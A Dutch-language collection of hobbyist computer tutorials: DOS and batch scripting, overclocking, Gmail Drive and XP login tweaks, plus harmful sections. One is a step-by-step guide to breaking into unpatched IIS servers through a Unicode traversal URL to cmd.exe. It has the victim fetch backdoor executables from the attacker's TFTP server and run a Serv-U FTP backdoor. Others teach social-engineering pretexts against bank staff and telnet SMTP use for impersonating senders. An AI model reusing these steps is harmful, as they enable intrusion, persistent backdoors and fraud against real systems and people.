Laten we eens het bestand TELNET(wat dit is doet er niet toe het is maar een test) starten: typ start telnet.exe (druk daarna wel op ENTER...)
En zie daar: een programma gestart vanuit DOS(met behulp van de opdracht start).

Je kunt dus bestanden starten met start bestandsnaam.???.
Sluit het venster venster van TELNET nu maar weer af...
Maar dan moet je wel kunnen weten welke bestanden er in de huidige actieve map zitten(C:\WINDOWS> dus).
Daarvoor gebruiken de opdracht dir. Typ eens achter de opdrachtregel: dir.
Dan zie je nu de bestanden en mappen in de map windows heel snel voorbij schieten...
Omdat het zo snel gaat is het niet te lezen...
We moeten dus een opdracht hebben waarmee je de bestanden in de map c:\windows\ scherm voor scherm kan bekijken...
Dat doen we met de opdracht dir /p ; dus typ: dir /p
Je ziet nu dit(natuurlijk kunnen de data en tijden anders bij jouw zijn!):

 

Het volume in station C is SYSTEEM .
Het volumenummer is 2342-1CF4
Map van C:\WINDOWS.

.

01-01-90 0:05 .
..
01-01-90 0:05 ..
SYSTEM
01-01-90 0:05 SYSTEM
COMMAND
01-01-90 0:05 COMMAND
OPTIONS
01-01-90 0:05 OPTIONS
UPGINFS
01-01-90 0:05 UPGINFS
HELP
01-01-90 0:05 HELP
SYSTEM32
01-01-90 0:05 SYSTEM32
MSAGENT
01-01-90 0:05 MSAGENT
CURSORS
01-01-90 0:05 CURSORS
JAVA
01-01-90 0:05 JAVA
UPGDLLS
01-01-90 0:05 UPGDLLS
DRWATSON
01-01-90 0:05 DRWATSON
MEDIA
01-01-90 0:05 MEDIA
LHSP
01-01-90 0:05 LHSP
STARTM~1
01-01-90 0:05 Start Menu
PCHEALTH
01-01-90 0:05 PCHEALTH
TWAIN_32
01-01-90 0:05 TWAIN_32
CONFIG
01-01-90 0:05 CONFIG
Druk op een toets om door te gaan . . .

Kijk eens naar de laatste regel: Druk op een toets om door te gaan . . .
Je moet dus op een toets drukken om het volgende scherm te bekijken(druk maar iets in...).
Er verschijnt nu een nieuw scherm met bestanden er mappen uit de zelfde map C:\WINDOWS\.
Alleen nu word er gewacht op een actie van de gebruiker en komen de files niet zo snel achter elkaar op het scherm zodat het onleesbaar wordt.
Druk nu maar even zo lang todat de opdrachtregel weer zichtbaar is
(het kan bij zo een grote map als C:\WINDOWS\ wel even duren,
dus ff een tip: hou de ENTER toets even ingedrukt... ).

Dat leuke trucje wat we net gedaan hebben met /p noemen we een parameter(/p dus!!!!!).
Zo zijn er nog meer parameters zoals /w enz.
Je kan het aantal parameters(als die er zijn) bekijken door middel van: opdracht /?.
Dus typ eens in: dir /?.
Je krijgt nu een scherm te zien met allerlei informatie over de parameters van de opdracht dir.
Zoals je nu ziet is je scherm gevuld met allerlei troep.
Dat is erg irritant als je veel opdrachten achter elkaar moet geven.
Dus(ja je raad het al!) geef ik je weer een nieuwe opdracht: cls.
CLS staat voor clear screen en heeft geen parameters.
Tik nu in: cls.
En zie daar: een prachtig schoon scherm met alleen de DOS-opdrachtregel.

Hoofdstuk 2: Bestands bewerking en mappen

In dit hoofstuk o.a. gaan we leren hoe we van directorie kunnen veranderen(JA, eindelijk uit die vervloekte windows-map),
en andere bestands bewerkingen.
Typ nu in: cd\
Je ziet nu: C:\> in plaats van C:\>WINDOWS>.
Met de opdracht cd\ ga je dus naar de hoogste map;
het station dus(bij de meeste systemen C:\>).
De opdracht cd\ heeft een paar parameters(maar die ga ik niet allemaal uitleggen)...
Tik nu eens in: cd c:\windows\desktop\
Nu ben je dus in de map c:\windows\desktop\.
Typ nu eens: dir /P
Je ziet nu alle bestanden scherm voor scherm die zich in de map desktop(en op je bureaublad) bevinden...

De namen zijn anders zoals outloo~1.lnk hoewel het moet zijn: Outlook Express.lnk
Dat komt omdat DOS nog werkt met de 8.3-bestandsnaam: 8 tekens als naam(outloo~1) en drie als extensie(lnk) gescheiden door een punt.
Een klein nadeel van DOS dus(hoewel dit ook het geval is in andere dingen zoals in de programmeertaal C++)...

Nog ff iets: Als je van station wilt wisselen(als je een ander station hebt dan C:\) typ dan gewoon de letter van het station gevolgd door :\
B.V: E:\

Verder heb ik nog wat handige opdrachten voor bestanden:
Opdracht Betekenis
del PAS OP!!!!!: Verwijdert een bestand B.V: del c:\bestand.txt
mkdir Maakt een map B.V: mkdir c:\mapnaam\
copy Kopieërt een bestand B.V: copy c:\bronmap\bronbestand.txt c:\doelmap\
xcopy Kopieërt een hele map inclusief bestanden B.V: xcopy c:\bronmap\ c:\doelmap
rd PAS OP!!!!!: Verwijdert een hele map inclusief bestanden B.V: rd c:\verwijderdezemap\
rename Wijzigt de naam van een bestand B.V: rename c:\bestand.txt c:\nieuwenaambestand.txt
exit Sluit gewoon simpel MS-DOS af(voor als je dom bent een voorbeeld:) exit

Hoofdstuk 3: Batch-bestanden

Dit is het leukste hoofdstuk van allemaal: Batch-bestanden.
Batch-bestanden zijn in feite kleine programma's die DOS-opdrachten stuk voor stuk uitvoeren. Je zult nu wel zeggen: Cool een programmeertaal!
Dat is niet zo, je kunt batch vergelijken omdat het op een programmeertaal lijkt maar dat is het niet: Batch is een script-taal.
Dat wil zeggen dat je het niet hoeft te compileren. Laat maar zitten... In ieder geval is het handig om met batch om te kunnen als je wilt gaan programmeren. Je zult veel opdrachten terug zien in echte programmeer-talen(zoals Pascal, Visual Basic, Qbasic, C, C++, Java enz.).

We beginnen door kladblok op te starten(hier typen we het bestand namelijk in...):
Ga naar start >> programma’s> > bureau-acc. > >kladblok.

Typ:
@echo off
cls
echo Dit is mijn eerste batch-bestand
echo.
echo Om nog iets op het scherm te laten zien:
pause
cls
echo Linux Rules!!!!!!!!!!!!
Ga nu naar: bestand >> opslaan als.
Sla het bestand nu op als c:\batchtest.bat(en dus niet als c:\batchtest.txt!!!!!!!!!!!!!!).
Start het bestand nu(Ga naar: start >> uitvoeren >> Typ: start c:\batchtest.bat).
En kijk eens aan: je hebt zojuist je eerste batch-programma geschreven.
We gaan het programma nu ontleden:

CLS
Kijk nu eens naar de regels met CLS: dat is de bekende DOS-clearscreen opdracht: Hij wist alle troep die nog in het DOS-venster staat.

Echo
De regels die met echo beginnen laten iets op het scherm zien.
Wil je dus je zelf voor lul zetten: echo Ik ben dom!!!!!!!!
De echo-regels gevolgd door een punt(.) stellen een witregel voor echo alleen bestaat dus niet.
@echo off zorgt ervoor dat niet de opdrachten zelf op het scherm worden weergeven(het is dan net of je de opdrachten zelf intypt).
Het @ voor echo off zorgt ervoor dat ook de opdracht echo off zelf niet word afgebeeld(probeer het maar eens zonder @...).

Pause
Pause is erg simpel:
Het onderbreekt het programma todat er op een toets gedrukt word en laat op het scherm tegelijk zien: Druk op een toets om door te gaan...

Okee dan! Je weet nu al een beetje hoe batch werkt...
Je kan ook de gewone DOS-opdrachten opnemen in je programma:

@echo off
rem Dit programma maakt een reserve kopie van mijn favourite map
cls
echo Dit programma maakt een reserve-kopie van de map C:\ DOCUMENTEN\
echo.
echo Plaats een diskette in station A:\ en
pause
copy c:\documenten\*.* a:\
cls
echo Gekopieerd!!!!

Rem
Zoals je ziet heb ik er een nieuwe opdracht bij geplaatst: rem
Rem staat voor remind(of remember?) en betekent onthouden. Rem geeft je dus de mogelijkheid commentaar op te nemen in je programma...
De regels die met rem beginnen worden dus niet gelezen door de computer.

Goto
Ook is er een opdracht waarmee je in een keer naar een andere programma-regel kan springen: goto.
Goto betekent "ga naar" en gaat naar een stukje in het programma dat begint met :
Voorbeeld:

@echo off
rem Dit programma blijft kopieren
rem Label om aan te duiden waar nieuw is.
:nieuw
cls
echo Dit programma maakt een reserve-kopie van de map C:\DOCUMENTEN\
echo.
echo Plaats een diskette in station A:\ en
pause
copy c:\documenten\*.* a:\
cls
echo Gekopieerd!!!!
rem Naar de label "nieuw" gaan
goto nieuw

Als je dit programma uitvoert zul je zien dat het programma blijft kopiëren.
De regel achter goto is dus een aanduiding waar de computer heen moet gaan.
Dat noemen wij een label: goto label
De label(het stukje waar de computer heen gaat als de computer de opdracht goto tegenkomt) begint altijd met een dubbele punt(:) :naam_label
Natuurlijk mogen er ook meer goto-opdrachten worden opgenomen in het programma.
Nu zul je wel zeggen: "Erg leuk die goto-opdracht maar wat heb ik eraan?".
Nou, dat zal ik eens uitleggen:
Ten eerste kan je het programma bewerkingen opnieuw laten uitvoeren.
En ten tweede is het handig als je de if-opdracht(word later uitgelegd...) gaat gebruiken...

If
If betekent in het Nederlands veraald: als.
If is handig om te controleren of er aan een waarde is voldaan:
Als je iets niet weet, ga naar de leraar om het te vragen!
Voorbeeld:

@echo off
cls
rem =====Dit batch-programma start een spelletje========
rem
rem Beschikbare games.
rem
if "%1" == "a" goto patience
if "%1" == "b" goto mijnenveger
rem
rem =======Als de parameter niet A,B of C was==========
rem Kies een spelletje
rem
echo.
echo Typ spel A of spel B.
pause
goto einde
:patience
rem
rem =========Dit is goto patience====================
rem Als DOS hier komt, werd patience gekozen.
rem
start C:\WINDOWS\SOL.EXE
rem
rem Als patience werd gekozen, mijnenveger overslaan.
rem
goto einde
:mijnenveger
rem
rem ======Dit is goto mijnenveger===================
rem Als DOS hier komt, werd mijnenveger gekozen.
rem
start C:\WINDOWS\WINMINE.EXE
rem
rem Als mijnenveger werd gekozen, patience overslaan.
rem
goto einde
rem =========Dit is goto einde======================
rem Ga na het spel terug naar het hoofdmenu
rem
:einde
cls

Dit programma heeft een parameter nodig die in het programma zelf aangeduid word als %1.
In de if-regel staat(in mensentaal): Als parameter1 gelijk is aan A ga naar patiance.
Parameter is dus %1 (de haakjes kan je weglaten)
Gelijk aan is dus ==
En ga naar is dus(Ja je raad het al!): goto patiance
Als er niet aan de If-waarde word voldaan word de opdracht if gewoon overgeslagen...

Sla het bestand nu eens op als C:\spel.bat
Als je dus MS-DOS opstart en achter de opdrachtregel typt: spel a (geen hoofdletters, A.U.B.!!!!!)
%1 word in het programma dus eigenlijk opgenomen als "a".
En het programma start het al bekende(maar verschikkelijk saaie) spel Patiance op!
Nog ff iets over parameters: Je kan een programma natuurlijk ook 2 parameters geven of zelfs 3 allemaal aangeduid met het %-teken:

@echo off
cls
rem Dit programma heeft de zelfde werking als de COPY opdracht in DOS.
copy %1 %2

Dit programma kopieert dus simpelweg de eerste parameter naar de tweede(%1 = het bestand dat gekopieerd moet worden, %2 de map waar het bestand moet komen).
Natuurlijk moeten de programma's met parameters wel vanuit MS-DOS gestart worden(tenzij je gebruik maakt van .PIF bestanden, maar dat leg ik later uit).
Natuurlijk kun je ook een menu maken voor b.v. het programma spel.bat:

@echo off
cls
rem ===Dit batch-bestand is het menu voor de games======
echo Computer Games
echo.
echo.
echo Maak een keuze uit:
echo.
echo A. Patience (standaard van windows)
echo B. Mijnenveger (standaard van windows)
echo.
echo U start een spel door spel te typen,
echo gevolgd door de letter voor het spelletje.
echo Druk vervolgens op ENTER. Bijvoorbeeld:
echo spel A.
echo.
prompt Maak uw keuze:

Prompt
Dit programma(opstarten in DOS natuurlijk, naam maakt niet uit) start je dus voor spel.bat.
Zoals je ziet heb ik een nieuwe opdracht opgenomen in dit programma: prompt
De opdracht prompt activeert de opdrachtregel weer, en daar achter de weergave van de opdrachtregel.
Wat normaal achter de opdracht regel staat(C:\WINDOWS>) is nu vervangen door:
Maak uw keuze:

Maak uw keuze is dus gewoon de opdrachteregel en dus werken alle DOS-opdrachten daar op.
Als je typt: spel A
Typ je dus eigenlijk gewoon achter de opdrachtregel(die met Maak uw keuze:) spel a.
Spel is dus het gestarte bestand en a de parameter.
Prompt is dus een opdracht die de opdrachtregel uit een batchbestand activeert, of de weergave van de huidige veranderd.
De huidige opdrachtregel C:\ACTIVEMAP> is dus: prompt $p$g
$p staat dus voor de active map en $g voor het groter dan teken(>).
De tekens met $ voorafgegegaan is een soort code(ik dacht: ANSI: American National Standard Institute) voor de prompt-opdracht:
Code voor prompt Teken
$q = ("is gelijk aan"-teken)
$$ $ (dollar teken)
$t Huidige tijd
$d Huidige datum
$p Actief station en pad(meestal standaard en samen met $g)
$v MS-DOS versienummer
$g > ("groter dan"-teken)
$l < ("kleiner dan"-teken)
$b | ("sluis"-teken)
$_ Naar het begin van de volgende regel
$e ASCII-escape code(code 27)
$ Backspace(om het voorgaande teken op de prompt-opdrachtregel te wissen)
$n Alleen het actieve station

eigen zin of woord(zoals Maak uw keuze: in het vorige programma) Je eigen zin

Call
De opdracht call betekent letterlijk vertaald: roep.Met de opdracht call kan je dus andere-batch bestanden aanroepen.
Stel dat we het laatste programma menu.bat noemen, en we willen dat spel.bat het menu afbeeld als het spel is gestart.
Dan nemen we in de nieuwe versie van spel.bat de opdracht call op:

@echo off
cls
rem ===Dit batch-programma start een spelletje==========
rem
rem Beschikbare games.
rem
if "%1" == "a" goto patience
if "%1" == "b" goto mijnenveger
if "%1" == "c" goto saddam
if "%1" == "d" goto einde
rem
rem =====Errorlevel==========================
rem Kies een spelletje
rem
echo.
echo Typ spel A of spel B.
pause
goto einde
:patience
rem
rem =======Dit is goto patience====================
rem Als DOS hier komt, werd patience gekozen.
rem
start C:\WINDOWS\SOL.EXE
rem
rem Als patience werd gekozen, mijnenveger overslaan.
rem
goto einde
:mijnenveger
rem
rem =======Dit is goto mijnenveger===================
rem Als DOS hier komt, werd mijnenveger gekozen.
rem
start C:\WINDOWS\WINMINE.EXE
rem
rem Als mijnenveger werd gekozen, patience overslaan.
rem
goto einde
rem ========Dit is goto saddam=====================
:saddam
start c:\menusy~1\saddam_1.exe
goto einde
rem
rem ========Dit is goto einde=======================
rem Ga na het spel terug naar het hoofdmenu
rem
:einde
cls
call menu.bat

Als je nu menu.bat start(met MS-DOS natuurlijk...) en je start een van de spellen,
zul je zien dat het programma spel.bat automatisch menu.bat weer aanroept met de opdracht call menu.bat
Het bestand menu.bat moet zich natuurlijk wel in de zelfde map bevinden,
anders moet je de map voor menu.bat zetten(b.v. C:\andere map\menu.bat)!!!!!!

Exist
Exist beteken letterlijk vertaald in het Nederlands: bestaat.
Bestaat is eigenlijk alleen voor bestanden:

@echo off
cls
if exist c:\backup\bestand.doc goto ok
rem*******************************************
rem hier komt MS-DOS als niet aan de if-waarde is voldaan
echo Backup is nog niet gemaakt!
rem reservekopie maken...
cls
echo Dit programma maakt een reserve-kopie van de map C:\ DOCUMENTEN\bestand.doc
echo.
echo Plaats een diskette in station A:\ en
pause
copy c:\documenten\*.* a:\
cls
echo Gekopieerd!!!!
goto einde
rem********************************************
:ok
echo De backup bestaat al!!!
goto einde
rem********************************************
:einde

De regel if exist c:\backup\bestand.doc goto ok betekent in werkelijkheid:
Als het bestand c:\backup\bestand.doc bestaat ga naar ok

THAT’S ALL!

PS: Maar als je een goede virus wilt gaan maken moet je bij visual basic scripts kijken!!!

 

 

 

 

Computer binnen dringen

Dit is alleen voor educatie doeleinden geschreven en aan admins te laten zien hoe makkelijk het kan zijn om een systeem binnen te dringen, zelfs voor n00bs. Zorg dan ook voor een goede beveiliging.

Dit is een tutorial die ik een tijd geleden heb geschreven maybe hebben jullie er wat aan, als het niet gewenst is delete hem dan maar meteen ^_^.

Dingen die je nodig hebt:

- Accesdriver (http://www.accessdiver.com)
- Internet Explorer
- skhack.zip (zoek via www.google.com)
- FlashFXP of iets dergelijks (www.download.com)
- TFTP server (search www.google.com)
- Een victim (een IIS server dus die onbeveiligt is)
- Serv-u (om de ftp op te zetten voor root access)

Begin:

1. Extract skhack.zip in c:\ftp\
2. Installeer: Accesdriver, FlashFXP, TFTP server en serv-u
3. Copy the servudaemon.ini vanuit de c:\ftp\ naar waar je serv-u hebt geinstalleerd en overwrite de file.

Serv-u

1. Dubbel klik local servers, klik dan op Domains, dan op ftp.
2. Hier kan je instellen op welke port je de ftp.
3. Ga dan naar USERS en doe rechtermuisknop doe new user. Neem een l/p. Neem de c:\ als start dir. En doe no lock users.
4. Nu krijg je setup user, en klik System Admin. Voor de rest kan je nog wat dingen instellen.
5. Doe nu apply en copy de servudaemon.ini weer terug van de serv-u dir naar c:\ftp\

TFTP server

1. Zorg bij de instellingen dat de inbound en outbound pathfile allebij c:\ftp\ is.

Accessdriver

1. Zet hem in als exploiter (hit my skill > exploiter)
2. Click op het foldertje en import de IIS.ini uit c:\ftp\
3. Bovenin vul je je victim in als "http://127.0.0.1/" (zonder "").
4. Druk op start.
5. Als ie klaar is met scannen en er zit een 502 tussen dat is ie "hackbaar" anders moet je een ander victim (ander ip) nemen voordat je verder kan.
6. Als je er een 502 tussenzit klik erop. Je hebt dan een path als http://127.0.0.1/scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\

7. Dit is de unicode: /scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\

8. Dit is part 1 van de unicode: /scripts/..%%35%63..%%35%63 (eindigt altijd waar winnt begint)

9. Dit is part 2 van de unicode: winnt/system32/cmd.exe?/c+dir+c:\

10. Zorg dat je tftp server draait.
11. Typ dit in je explorer: http://127.0.0.1/UNICODEPART1winnt/system32/cmd.exe?/c+c:\winnt\system32\tftp.exe+"-i"+jouweigenip+get+WINMGNT.EXE+c:\WINMGNT.EXE

12. Zorg dat waar "jouweigenip" staat ook je ip staat. Weet je niet wat je ip is (www.whatismyip.com)

13. Druk enter, en check in je TFTP server of je activiteit ziet, als het goed is zie je een progress bar en word WINMGNT.EXE geupload.

14. Herhaal dit voor: kill.exe, tlist.exe, winlogin.exe en servudaemon.ini

15. Als ze upgeload zijn typ dit in explorer: http://127.0.0.1/UNICODEPART1winnt/system32/cmd.exe?/c+c:\WINMGNT.EXE%20/h

16. Test het met FlashFXP door in te loggen met ip en l/p.

17. Als alles gelukt is heb je nu alle controle over de pc. Je hebt eindelijk root access ^_^.

18. Je kan met serv-u nog van alles instellen zoals meer users enz maar daar gaat deze tuto niet over.

 

 

 

 

Social Enginering

Social Enginering

Deze text is een inleiding in de kunst van het misleiden,
Dit is zowat de basis van SE, waar alles op rust =)

Eerst en vooral, wat is Social Enginering?
SE is de kunst van het misleiden, geheime info verkrijgen door mensen te misleiden.
Je kan SE ook wel voorstellen als de exploit voor het grootste securityhole dat er bestaat... wij, mensen =)
De zwakste schakel in heel het concept van beveiliging is de mens, een systeem kan de beste beveiliging hebben dat er bestaat, het is nog steeds kwetsbaar... idd... door de beheerder, de mens =)
Niet alleen op computervlak is dit zo, een winkel bevoorbeeld... het mag het beste alarmsysteem hebben, beste sloten, beste videocamera's die er bestaan... maar de eigenaar/verkoper is nog steeds kwetsbaar bijgevolg is de winkel zelf kwetsbaar :)
Omdat beveiliging geen technologisch probleem is, maar een menselijk probleem,
moeten we naar de mensen gaan, ipv onze systemen steeds veiliger te maken, betere beveiligingsmethoden te zoeken, etc...
(think of this: Complexiteit is de vijand van veiligheid)
Privacy policies bij bedrijven zijn al een goed begin, maar denk je dat alles wat daarin staat ook word gedaan door de werknemers? Er zal allicht wel eens iemand afwijken ervan, en zeker voor vriendelijke mensen aan de andere lijn die om een klein gunstje vragen ;) SE'er dus.
Hoe kunne we ons er dan tegen beschermen? Zoals je al weet.. "security is an illusion", we kunnen ons er nooit volledig tegen wapenen, maar we moeten goed geinformeerd worden over SE. Dan staan we al een stuk verder =)
SE is een krachtig, maar soms moeilijk wapen. Een overval van een bank zonder enig gebruik van geweld, volledige controle over bedrijven, topgeheime informatie van overheidsinstanties, het is allemaal mogenlijk met SE =)
Niet om jullie aan te zetten tot bankovervallen of dergelijke, maar op dit moment, als je dit leest zijn honderden bedrijven slachtoffer van SE.

Hoe zit een aanval van een SE'er er ongeveer uit?
Wel kzal ff een klein overzichtje make.

I. VERKENNING
1. Over welke info wil ik beschikken?
2. Waar kan ik die info verkrijgen?
3. Hoe gaan de mensen tewerk, hoe gaan ze met elkaar om, wat zijn de procedures, wat zijn de namen van gebouwen etc van die plek.
4. Welke info moet ik specifiek hebben voor mijn attack, gaande over puntje 3.
II. UITVOERING
1. Een plan opstellen, een scene maken voor zijn attack, incl technieken.
2. The attack =) De theorie wordt in de praktijk omgezet =)
(3. Moment of glory :D )

De verkenning moet zeer gedetaileerd gebeuren, de SE'er moet onverwachte vragen vermijden en moet zich dus zo veel mogelijk inlichten.
De uitvoering...
'het plan' opstellen, de SE'er kiest hoe hij tewerk zal gaan,
zoals bij verkenning moet hier ook aandacht zijn voor onverwachte situaties.
de uitvoering zelf een kwestie van skills
SE skills opdoen is dan weer een kwestie van oefening :)
En dan The moment of glory =) Als de aanval een succes was natuurlijk =)

Nu de verkenning bestaat grotendeels uit SE skills, om procedures en andere belangrijke info te krijgen van een organisatie, zal je ook SE moeten gebruiken. Dit is een voorbereiding op de eigenlijke attack, de essentie, de exacte informatie die moet verkregen worden.

Vertrouwen

"Security is not a product, it's a process", juist hetzelfde bij vertrouwen.
Nu vertrouwen, kzal da ff opdelen, hoe zalk het noemen...
Je hebt process-vertrouwen en een instant-vertouwen
Wa ik bedoel met process-vertrouwen...
Dit onstaat door veel met de persoon om te gaan, die persoon niet verder benaderen,
maar er met omgaan als 'een zakenpartner waar je goed mee overweg kunt' =)
Instant-vertouwen..
Ik kan nu de KBC in schil opbelle en zegge da ik van de grote KBC building in brussel ben,
door de nodige 'inside information' (die te verkrijgen valt bij de verkenning)
zal die persoon zich open stellen voor mij en mij helpen met wat ik nodig heb. =)
Dan 'vertrouwt' hij mij, moete is over nadenke das een heel ander soort vertrouwen,
persoonlijk is er geen vertrouwen, maar als zakelijk wel.
Ge zou da wa kunne vergelijken met 2 pc's, pc 1 laat alleen connecties toe van
pc 2 en omgekeerd. Als pc2 een connectie wilt met pc1 zal pc1 die aanvaarden, want
het is zijn 'partner', maar wie zegt dat pc2 wel echt pc2 is =)
Hetzelfde bij 'human nature', als er nen dweep aan de lijn is die zegt da em de kerstman is,
wilt da ni zegge da ge op dat moment me de kerstman zijt aant telefoneren =)
Vertrouwen is een in de meeste gevallen een cruciaal element. Dus denk eerst na voor je iemand vertrouwt =)

Omgaan met informatie (en het risico ervan)

Ik zal beginnen met een voorbeeld, dat jullie allemaal kunnen staven vanuit jullie eigen ervaringen. Toen de CD's hun intreden deden, was iedereen zeer voorzichtig met die CD's, altijd voorzichtig in de CD speler steken en in het doosje, zien dat er geen krassen opkomen etc, maar naar mate men CD's gebruikte begon de voorzichtigheid met deze CD's te verdwijnen =)
Hetzelfde gebeurt met informatie, wat grote gevolgen kan hebben voor een bedrijf.
In de bankwereld krijgen de werknemers elke dag een code, die code word zo veel gebruikt dat de voorzichtigheid van heel die zaak vervaagt.
"Seg wa was de code van vandaag nuweer?" - "Euh, ff zien... 76"
UC? Bedrijven/banken welke organizatie dan ooit moeten strikte regels hebben deze codes niet zomaar te zeggen, en als dat het geval zou zijn eerst een grondige identificatie te doen van die persoon.

Inform to get informed =)

[MAAK JE EIGEN SE TRICK PAGINA, KLIK HIER]

 

 

 

Proccesor overklokken

Je processor overklokken, houd dit in je hoofd:

-Niet zomaar gaan overklokken, alleen als je weet hoe het moet, en wat de risico’s zijn. Na het lezen van deze Tweak moet het wel lukken denk ik zo.

-Bekijk eerst goed wat voor processor je hebt, wat voor koeler erop zit, en de processor en kast temperaturen.
Als die temperaturen al redelijk hoog zijn, dan kan je beter niet gaan overklokken.

-Bij overklokken (en zeker bij je processor overklokken) is er altijd een risico op beschadiging van je processor, of zelfs je moederbord! Let daarom altijd goed op de temperaturen, en zodra die te hoog zijn, meteen de pc uitzetten.

-Je moet in ieder geval weten hoe je in je BIOS komt, en hoe je de instellingen daar kan saven.
Als je dat niet weet raad ik je aan om niet te gaan overklokken.

De basics
Hier ga ik in het kort even uitleggen wat het overklokken nou precies inhoud. Een processor loopt vanuit de fabriek op een snelheid, die de fabrikant bepaalt. Op die snelheid word de koeling meestal ook afgesteld, alhoewel er altijd een ruime buffer is. Ik zal het verduidelijken met een voorbeeld:

Stel, je hebt een Pentium 4 2,6 Ghz en een Pentium 4 2,8 Ghz. De fabrikant produceert alleen maar de 2,8 Ghz modellen, maar de 2,6 Ghz draait langzamer van de fabriek uit. Hij kán echter wel draaien op 2,8 Ghz. Met overklokken maak je daar gebruik van. Natuurlijk geld dit niet voor elke processor, de buffer verschilt nogal per model. In feite kan je een processor zover opvoeren als je wilt, maar er zijn een aantal ogen en haken. De warmte is erg belangrijk, dit is de grootste vijand van een computer. Je moet altijd zorgen voor een goede koeling, zeker als je gaat overklokken. Verder is er ook een grens, aan wat je moederbord en je andere hardware kunnen hebben. Als je je processor opvoert wil ie namelijk ook meer stroom, maar dat kan het moederbord niet aan. Dit zijn allemaal factoren waar je rekening mee moet houden.

FSB en Multiplier??
FSB en Multiplier zijn termen die een overklokker heel vaak tegenkomt/gebruikt. Ik leg hier uit wat ze betekenen, dat kan nog van pas komen.
FSB: Front Side Bus. Dit is de verbinding tussen de onderdelen van je pc, en dan met name tussen het geheugen en de processor. Deze snelheid bepaalt ook de snelheid van de processor, samen met de multiplier.

Multiplier: Multiplier is letterlijk vertaald: vermenigvuldiger. Als je de snelheid van je CPU wilt uitrekenen, en je weet de FSB snelheid, en de multiplier, dan vermenigvuldig je die met elkaar, en dan kom je uit op de processorsnelheid.

Het echte werk
Ok, nu is het tijd voor het echte werk. Je kan het beste deze Tweak even uitprinten, want het overklokken gaat in je BIOS, en daar heb je geen Internet ofzo.

---

Stap 1. Bekijk de temperaturen van je PC (processor- en kasttemperaturen). Dat kan in je BIOS, of in Windows met een programma als CPU Cool. Als de CPU temperatuur hoger is dan 55 graden kan je beter niet gaan overklokken (zonder betere koeling). Als de temperatuur in je kast hoger is dan 40 graden kan je ook beter niet gaan overklokken zonder extra koeling.

Stap 2. Ik neem aan dat de temperaturen goed zijn, en dat je wilt gaan overklokken, en dat je deze handleiding hebt uitgeprint, of op een andere pc kan kijken wat je moet doen. Zo ja, start je pc dan opnieuw op, en ga je BIOS in.

Stap 3. Zoek in je BIOS naar iets met CPU Settings. Daar kan je als het goed is de FSB óf de Multiplier instellen. Ik ga uit van de FSB, omdat dat de meest voorkomende optie is.
Je kan nu dus uitrekenen hoe snel je CPU draait als je de FSB met verhoogt. Ik adviseer je om per keer maximaal 3 of 4 bij je FSB op te tellen.

Stap 4. Als je dat gedaan hebt, sla je de instellingen in je BIOS op, en laat je Windows starten. Nu moet je CPU Cool weer opstarten, en de temperaturen bekijken. Ook is het aan te raden om even een half uurtje á 45 minuten te gamen (een zware game als UT2003 bijvoorbeeld) en daarna weer de temperaturen te bekijken. Dit herhaal je een paar keer, maar let heel goed op de temperaturen, en overklok nooit hoger dan je processorsnelheid + 10% (mits je geen extra of betere koeling hebt geregeld).

!!! Dit is geheel op je eigen risisco, wij zijn niet aansprakelijk voor welke schade dan ook !!!

 

 

 

HDD van je Gmail

Let op: Als je niet ingelogd bent kan je maar 10% zien van alle tutorials zien!!

Uitleg:
GMail Drive is een Shell Namespace Extension die een virtuele schijf maakt van van je Gmail account, daardoor kun je Gmail gebruiken als een opslag plaats voor je files. GMail Drive maakt een drive van je Gmail account waarmee je files kan opslaan en weer terug halen in je Windows Explorer. GMail Drive voegt een nieuwe schijf toe aan je Computer in Mijn Computer folder, je kan er files op maken, kopieren, saven enz. Als je een nieuwe file aanmaakt dan maakt het programma er een Email van en stuurt dit naar je account. De mail verschijnt in de gewone inbox en de file is als bijvoegsel bij de mail geduwd. GMail Drive checkt om de tijd de mails op je account (maakt gebruik van de Gmail zoek functie) om te kijken of er nog nieuwe files toegevoegd om dan de directory aan te passen. Maar in feiten dient GMail Drive als een extra hard-drive die geinstalleerd is op je PC.

Download:
Hier

Uitvoeren:
Extract de Files van de Rar naar 1 of andere folder op je HDD.


Druk op de Setup.


Je krijgt nu een scherm dat kun je gewoon afsluiten.
Ga nu naar je Deze Computer en je ziet de extra HDD.
Druk hier 2 keer op en je moet je wachtwoord en usernaam invullen.

Je kan nu Autologin aanvinken zodat je, je wachtwoord en je en je usenaam niet meer hoeft in te vullen.

En nu kun je gewoon iets kopiëren naar je nieuwe harde schijf.

 

 

 

Login in XP weghalen

Als je enige gebruiker bent in windows XP krijg je bij het opstarten nog steeds het vervelende schermpje dat je je gebruikersnaam en wachtwoord in moet voeren.

Dit scherm is niet altijd nodig en uiteraard kan je dit uitschakelen:

1. Ga naar Start -> Uitvoeren en typ in: Control userpasswords2

Er verschijnt een scherm genaamd Gebruikers accounts, dit is niet het standaard scherm van Windows XP maar de geavanceerde versie, hierin vink je het hokje "gebruikers moeten een gebruikersnaam en wachtwoord opgeven om deze computer te kunnen gebruiken" uit.

2. Klik op OK,

3. Wanneer je reboot zal je zien dat je niet meer je gebruikersnaam in hoeft te vullen of hoeft aan te Klikken!

 

 

 

E-mail Telnet

Hier wordt uigelegd hoe je, zonder verder iets te downloaden, kunt mailen. Je kunt het gebruiken om gewoon een mailtje te sturen, maar ook voor andere dingen...zoals je voor doen als iemand anders...Het werkt eigenlijk heel simpel. het kan op meerdere manieren...zoals het downloaden van een fakemailer ofzo, maar het werkt allemaal zoals hier beschreven, alleen hebben ze het in dat soort programma's makkelijker gemaakt voor de gebruikers.

TELNET

Start telnet (start ==>uitvoeren==>telnet). Nu kan je de oude en de nieuwe versie van telnet krijgen! Bij de oude kom je in een windows scherm met menu enzo terecht, bij de nieuwe in een dos venster.

Veel verschil is er echter niet, alleen bij de eerste stap


Oude versie:
klik op verbinden en dan op extern systeem. Nu moet je een hostnaam opgeven. Je moet hier het host van een SMTP server invullen (bv mail.hotmail.com, mail.home.nl) Nu moeten we de poort invullen. SMTP werkt normaal op poort 25 dit kan wel eens anders zijn maar als je mail.hotmail.com hebt ingevuld bij hostnaam dan moet je poort 25 invullen. Wat je kiest bij TermType maakt niet uit, omdat we inloggen op een andere poort dan telnet. nU klik je op verbinden.

Nieuwe versie:
tik het volgende: open mail.hotmail.com 25
de SMTP server kan je natuurlijk veranderen, nu ben je binnen!

Voor allebei de versies hetzelfde:
- mail versturen
